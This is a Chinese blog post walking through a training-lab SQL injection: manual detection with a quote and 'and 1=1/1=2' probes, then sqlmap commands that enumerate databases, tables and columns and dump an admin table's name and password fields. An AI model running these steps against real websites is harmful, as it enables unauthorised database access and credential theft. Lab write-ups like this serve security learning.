美文网首页无中生有
无处不在的SQL注入

无处不在的SQL注入

作者: 雨落八千里 | 来源:发表于2020-01-06 22:18 被阅读0次

实训中学习了一下sql注入。于是在i春秋发现了简单的sql注入于是就做的玩了玩。
【无处不在的SQL注入】

下面是一些总结:

第一步 手工检测判断注入点

在网站中查找一个url中带有id 的网址http://www.test.ichunqiu/Art_Show.php?id=2
首先在id=2后面加一个单引号来判断这是否是一个注入点,返回了一个错误提示更新点击数出现错误!。现在替换一个注入查询语句换成 and 1=1,页面并没有出现变化再换成 and 1=2返回一个错误提示。
\
提示:
这里出现了一个错误提示,更新点击数出现错误,这样说明我们输入的and 1=1 和and 1=2在数据库内执行了,因为and 1=1这条查询语句就永为真,它就会继续执行,and 1=2 这条语句就为假,查询语句无法继续执行,就会返回错误,这样我们就可以初步判断这个url地址是一个注入点。

第二步 利用sqlmap对注入点进行注入

首先找到文件sqlmap.py所在文件夹,然后在cmd运行python sqlmap.py –u "http://www.test.ichunqiu/Art_Show.php?id=2"


返回信息:

返回信息提示这是一个注入点并且返回对方系统的信息,系统是windows,Web容器是apache2.4.9版本,语言php5.2.17版本,目标数据库是mysql5.0.11版本。
第三步 获取数据库内信息
  1. 获取有多少个database
    Python sqlmap.py –u "http://www.test.ichunqiu/Art_Show.php?id=2" --dbs

    返回信息:

    获取数据库内所有数据库的名称,返回信息目标数据库内有四个数据库mys ,mysql, test, information_schema
  2. 查看网站所依赖的数据库的名称
    Python sqlmap.py –u "http://www.test.ichunqiu/Art_Show.php?id=2" --current–db

    返回信息:

    当前使用的数据库是mys
  3. 获取指定数据库内表的信息
    Python sqlmap.py –u "http://www.test.ichunqiu/Art_Show.php?id=2" -D mys --tables

    返回信息:
  4. 获取指定数据库内表的字段信息
    Python sqlmap.py –u "http://www.test.ichunqiu/Art_Show.php?id=2" -D mys -T zzcms_admin --columns

    返回信息:
  5. 获取获取指定数据库内表的特定字段内容信息
    Python sqlmap.py –u "http://www.test.ichunqiu/Art_Show.php?id=2" -D mys -T zzcms_admin –C name,password --dump

    返回信息:

相关文章

  • 无处不在的SQL注入

    实训中学习了一下sql注入。于是在i春秋发现了简单的sql注入于是就做的玩了玩。 【无处不在的SQL注入】 下面是...

  • web常见漏洞的成因和修复

    1.SQL注入 漏洞描述:SQL 注入攻击( SQL Injection ),简称注入攻击、SQL 注入,主要用于...

  • 笔记:web漏洞

    SQL注入 SQL注入攻击(SQL Injection),简称注入攻击、SQL注入,被广泛用于非法获取网站控制权,...

  • 第四章 SQL 注入

    要点 SQL注入 SQL注入防护 一、SQL注入 SQL注入:黑客会通过构造一些恶意的输入参数,在应用拼接 SQL...

  • 谈谈sql注入之原理和防护(-)

    谈谈sql注入(二)谈谈sql注入(三)谈谈sql注入(四)所谓SQL注入,就是通过把SQL命令插入到Web表单提...

  • 谈谈sql注入之语句构造手法(二)

    谈谈sql注入(一)谈谈sql注入(三)谈谈sql注入(四)SQL注入的手法相当灵活,在注入的时候会碰到很多意外的...

  • 小迪16期-20170226

    第二天:Sql注入集锦篇 1.Sql注入之access注入 2.Sql注入之mysql注入 3.Sql注入之mss...

  • SQL注入三部曲-初级

    目录 什么是SQL注入SQL注入产生的原因SQL注入攻击方式如何进行SQL注入SQL注入三部曲 1.渗透攻防WEB...

  • PHP代码安全之SQL注入

    PHP代码安全之SQL注入 1、什么是SQL注入? SQL攻击(英语:SQL injection),简称注入攻击,...

  • sql注入那些事儿——如何优雅地进行SQL注入(3)

    传送门: sql注入那些事儿——如何优雅地进行SQL注入(1)sql注入那些事儿——如何优雅地进行SQL注入(2)...

网友评论

    本文标题:无处不在的SQL注入

    本文链接:https://www.haomeiwen.com/subject/fgflactx.html